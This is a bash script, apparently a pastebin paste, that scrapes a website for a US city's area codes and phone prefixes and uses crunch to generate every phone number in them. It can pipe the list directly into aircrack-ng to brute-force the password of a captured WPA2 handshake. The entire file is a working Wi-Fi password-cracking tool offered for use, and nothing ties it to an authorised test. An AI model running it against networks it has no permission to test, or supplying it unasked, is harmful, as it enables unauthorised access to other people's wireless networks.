1. #######################################
  2. # U.S. Phone Number Generator by DERV #
  3. #######################################
  4. #
  5. # revision 4 changes:
  6. #  -removes duplicates for numbers that don't contain the area code (prefix only)
  7. #
  8. # revision 3 changes:
  9. #  -aircrack-ng passthrough for WPA cracking (saves time/space)
  10. #    -key is outputted to aircrack.txt and script stops immediately if key is found
  11. #
  12. # revision 2 changes:
  13. #  -menu system to output certain phone number formats
  14. #  -corrected error for cities with spaces in the name
  15. #
  16. # uses CRUNCH to generate mostly valid phone numbers
  17. # crunch can be found here: http://sourceforge.net/projects/crunch-wordlist/
  18. #
  19. ############################################################################
  20.  
  21. # trap term/keyboard interrupt signals
  22. trap ITSATRAP INT
  23. trap ITSATRAP TERM
  24. ITSATRAP() {
  25.   echo ""
  26.   echo "Keyboard interrupt; exiting."
  27.   exit
  28. }
  29.  
  30. # path and filename of 'crunch' -- wordlist generator
  31. CRUNCH="/pentest/passwords/crunch/./crunch"
  32. if [[ ! -f "$CRUNCH" ]]; then
  33.   echo ""
  34.   echo "[!] Path to crunch not found! ($CRUNCH)"
  35.   echo "[!] Please edit phone.sh Line 31 to the correct path to Crunch"
  36.   exit
  37. fi
  38.  
  39. # intro
  40. echo ""
  41. echo "[-] U.S. Phone Number Generator by DERV"
  42. echo ""
  43.  
  44. echo -n "[+] Enter a U.S. City (e.g. chicago): "
  45. read CITY
  46.  
  47. # website we use can't have spaces -- needs plus-signs (+) instead
  48. CITY=$(echo "${CITY}" | sed 's/ /+/g')
  49.  
  50. # menu
  51. echo ""
  52. echo "[-] Select the format for the phone numbers:"
  53. echo ""
  54. echo "    1) (555)555-5555 [13 chars]"
  55. echo "    2) 555-555-1234  [12 chars]"
  56. echo "    3) 5555555555    [10 chars]"
  57. echo "    4) 555-1234      [ 8 chars]"
  58. echo "    5) 5551234       [ 7 chars]"
  59. echo ""
  60. echo -n "[+] Enter a number between 1 and 5: "
  61.  
  62. read STYLE
  63. # check if style (phone number formatting) is a valid menu option
  64. if [[ "$STYLE" -lt "1" ]] || [[ $STYLE -gt "5" ]]; then
  65.   # if they picked something < 1 or > 5
  66.   echo ""
  67.   echo "[!] Invalid menu number; exiting."
  68.   exit
  69. fi
  70.  
  71. # wpa passthrough question
  72. echo ""
  73. echo "[?] Do you want to passthrough the phone numbers into "
  74. echo -n "     aircrack-ng to crack a WPA handshake capture file? (y/n): "
  75.  
  76. read ANS
  77. if [[ "$ANS" == "y" ]]; then
  78.   # get .cap path
  79.   echo ""
  80.   echo -n "[+] Enter path to the .cap file containing WPA2 handshake: "
  81.   read CAP
  82.   if [[ ! -f "$CAP" ]]; then
  83.     # if the .cap file does not exist, gtfo
  84.     CAP=""
  85.     echo ""
  86.     echo "[!] CAP file \'${CAP}\' not found; defaulting output to phone.txt"
  87.   else
  88.     # cap file exists, get the ESSID
  89.     echo ""
  90.     echo -n "[+] Enter the ESSID of the access point: "
  91.     read ESSID
  92.   fi
  93.   rm -f aircrack.txt
  94.  
  95. else
  96.   # if CAP="", then we will only output phone numbers to phone.txt; no passthrough
  97.   CAP=""
  98. fi
  99.  
  100. # get html from site
  101. echo ""
  102. echo "[-] Gathering area-code and prefix information from web..."
  103. wget -O /tmp/page1.txt http://www.melissadata.com/lookups/phonelocation.asp?number=${CITY}
  104.  
  105. if [[ $(cat /tmp/page1.txt) == "" ]]; then
  106.   echo ""
  107.   echo "[!] Unable to access phone numbers for city '${CITY}'; exiting"
  108.   exit
  109. fi
  110.  
  111. # grab the beginning of the phone numbers
  112. awk ' BEGIN {FS = "?number=" } {print $2} ' /tmp/page1.txt >> /tmp/page2.txt
  113. rm /tmp/page1.txt
  114.  
  115. # strip the end of the number (ignoring the trailing '0000' for each #)
  116. awk ' BEGIN {FS = "0000\"" } {print $1} ' /tmp/page2.txt >> /tmp/page1.txt
  117. rm /tmp/page2.txt
  118.  
  119. # remove blank lines 'cause I suck at awk
  120. awk '$0!~/^$/ {print $0}' /tmp/page1.txt > /tmp/page2.txt
  121. rm /tmp/page1.txt
  122.  
  123. if [[ $STYLE -gt "3" ]]; then
  124.   # don't need area code!
  125.   while read Lines
  126.   do
  127.     echo ${Lines:3} >> /tmp/page1.txt
  128.   done < /tmp/page2.txt
  129.   rm /tmp/page2.txt
  130.   cat /tmp/page1.txt | sort | uniq > /tmp/page2.txt
  131.   rm /tmp/page1.txt
  132.  
  133. fi
  134.  
  135. # get rid of previous phone.txt file (so we don't concatenate)
  136. echo "" > phone.txt
  137.  
  138. # at this point, /tmp/page2.txt contains all of the area codes and prefixes for the city
  139.  
  140. # loop through every areacode/prefix
  141. while read Line
  142. do
  143.   # if we are passing through to aircrack and we've cracked it, stop!
  144.   if [[ ! "$CAP" == "" ]] && [[ -f "aircrack.txt" ]]; then
  145.     break
  146.   fi
  147.  
  148.   # formats the line to fit the style
  149.   if [ $STYLE = '1' ]; then
  150.     # Style: (###)###-@@@@
  151.     Line="(${Line:0:3})${Line:3}-"
  152.     LEN=13
  153.  
  154.   elif [ $STYLE = '2' ]; then
  155.     # Style: ###-###-@@@@
  156.     Line="${Line:0:3}-${Line:3}-"
  157.     LEN=12
  158.  
  159.   elif [ $STYLE = '3' ]; then
  160.     # Style: ######@@@@
  161.     Line=${Line} #nothing changes
  162.     LEN=10
  163.  
  164.   elif [ $STYLE = '4' ]; then
  165.     # Style: ###-@@@@
  166.     Line="${Line}-"
  167.     LEN=8
  168.  
  169.   elif [ $STYLE = '5' ]; then
  170.     # Style: ###@@@@
  171.     # Line="${Line}"
  172.     LEN=7
  173.   fi
  174.  
  175.   # now that we know the format, see if we are passing through to aircrack or phone.txt
  176.   if [[ ! "$CAP" == "" ]]; then
  177.     # cap file exists, need to pass through to aircrack
  178.     echo "[-] Passing through to aircrack: ${Line}####..."
  179.     ${CRUNCH} $LEN $LEN 0123456789 -t ${Line}@@@@ | aircrack-ng -l aircrack.txt -w - -e ${ESSID} ${CAP}
  180.  
  181.   else
  182.     # no cap file, just output to phone.txt
  183.     echo "[-] Creating phone numbers for areacode/prefix: ${Line}..."
  184.     ${CRUNCH} $LEN $LEN 0123456789 -t ${Line}@@@@ >> phone.txt
  185.   fi
  186. done < /tmp/page2.txt
  187.  
  188. # delete temporary file containing area codes/prefixes
  189. rm /tmp/page2.txt
  190.  
  191. if [[ ! "$CAP" == "" ]]; then
  192.   # if we were trying to passthrough
  193.   echo -n "[!] Finished! "
  194.  
  195.   if [[ -f "aircrack.txt" ]]; then
  196.     # if we cracked it
  197.     echo "Password found: " + $(cat aircrack.txt)
  198.   else
  199.     # if we didn't crack it
  200.     echo "Password not found."
  201.   fi
  202.  
  203. else
  204.   # if we were just generating phone numbers
  205.   echo "[!] Finished!; results are saved in 'phone.txt'"
  206. fi